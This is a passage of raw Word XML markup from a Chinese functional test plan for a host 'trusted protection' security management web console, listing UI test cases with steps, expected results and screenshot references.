                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>预设条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AE46E5F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PC可以访问被测试的系统web端地址链接</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="6538D88E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FD692A6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05C4AD4B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:cstheme="minorBidi" w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>首页汇总了管理平台中的实用信息。点击右上角的菜单可以直接跳转到相关页面，比如“可信防护”等。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="2A62BC5D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="3775"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50D8B646" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24D56A7B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="581A9A78" wp14:editId="0FA4D7D8">
                  <wp:extent cx="4104005" cy="2189480"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="2032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pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId16"/>
                          <a:srcRect t="5172"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2189480"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="1D6EA9E6" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28E100CC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AE850C0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39788F5B" w14:textId="6CCDAEE1" w:rsidR="00C55A9C" w:rsidRDefault="00C55A9C" w:rsidP="002A0233">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="265" w:name="_Toc36487918"/>
      <w:bookmarkStart w:id="266" w:name="_Toc36630312"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>可信防护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="265"/>
      <w:r w:rsidR="002A0233">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>功能测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="266"/>
    </w:p>
    <w:p w14:paraId="59809885" w14:textId="46536ED4" w:rsidR="002A0233" w:rsidRPr="00536672" w:rsidRDefault="002A0233" w:rsidP="002A0233">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="267" w:name="_Toc36630313"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可信防护-防护控制界面</w:t>
      </w:r>
      <w:bookmarkEnd w:id="267"/>
    </w:p>
    <w:p w14:paraId="612075BE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>如果处于被可信保护的状态，用户需要进行对被保护机器的操作，可以通过两种途径，一种是直接暂停当前的可信保护。然后就可以自然正常的在被保护机器上随意正常的操作，操作完再重新打开可信保护就可以重新恢复到可信状态防御。另一种是采用直接授权的运维登录（这里可以是客户自己的运维登录工具），通过可信授权后的运维登录操作，我们都会进行自动的可信计算防御分析，保证这个时候的运</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>维操作</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>都是属于可信状态的。除了以上两种途径，如果有用户或者攻击者使用其它途径对机器进行了操作，那怕是管理员账号都会立刻被发现并能阻止。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3551D224" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:ind w:leftChars="228" w:left="479" w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>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691"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="7D96D240" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EF779EF"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测试用例标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="170D8AE9"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可信防护-防护控制功能测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="7BE80546" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E0CD7A4"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测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DB961C0"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PC电脑、</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Google Chrome </w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>浏览器</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="25ED544E" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F1F3875"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预设条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BC594E1"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PC可以访问被测试的系统web端地址链接</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="34BA6D9D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CC802A3"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测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4019F9F0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="1f4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>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点击菜单栏“可信防护”按钮，跳转至可信防御界面，默认图表显示界面。上面会显示出来被保护机器的状态</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F96340B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>防控制</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>界面，点击“主机组”，切换成主机组列表</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00576B42" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="2587E399" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="3775"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F0BE112"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预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35C6713E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="1f4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>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在可信防御界面即可以全部主机列表功能</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18F31B30"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41F942AD" wp14:editId="127FAC16">
                  <wp:extent cx="4156075" cy="2014220"/>
                  <wp:effectExtent l="0" t="0" r="9525" b="1778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stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4242067" cy="2055731"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="4166B4BD"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46F9752D" wp14:editId="6B110720">
                  <wp:extent cx="4170045" cy="1895475"/>
                  <wp:effectExtent l="0" t="0" r="20955" b="952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8" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4306631" cy="1957400"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C308842"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运维登录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CE81E67"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="074B5748" wp14:editId="706013FC">
                  <wp:extent cx="4140200" cy="2378075"/>
                  <wp:effectExtent l="0" t="0" r="0" b="952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9" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4140200" cy="2378075"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FE30167" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="02B997CD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="1f4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:ind w:firstLineChars="0"/>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在可信防御界面即可以全部主机列表功能</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25013C9C"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30EB988B" wp14:editId="5947D8D9">
                  <wp:extent cx="4114800" cy="2400300"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270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20" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2400300"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B7EFBCD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>添加主机组</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="118EAAC3"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3456DA32" wp14:editId="02FD7015">
                  <wp:extent cx="4133850" cy="2512695"/>
                  <wp:effectExtent l="0" t="0" r="6350" b="190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21" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4133850" cy="2512695"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2939B2AA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="089F013B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69333521"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lastRenderedPageBreak/>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C8A16F1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="56FEFAA4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="002A0233">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="268" w:name="_Toc36487919"/>
      <w:bookmarkStart w:id="269" w:name="_Toc36630314"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可信防护-图标统计界面列表显示</w:t>
      </w:r>
      <w:bookmarkEnd w:id="268"/>
      <w:bookmarkEnd w:id="269"/>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691"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="77E71DD7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0EE246FD"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测试用例标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19CA107C"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可信防护-图标统计显示功能测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="21788490" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7870B52B"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测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16E31A66"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PC电脑、</w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Google Chrome </w:t>
            </w:r>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>浏览器</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="579DBFDE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2782430F"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预设条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B535982"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PC可以访问被测试的系统web端地址链接</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="70E100EF" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59D69A36"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测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6691" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18E6FF68" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
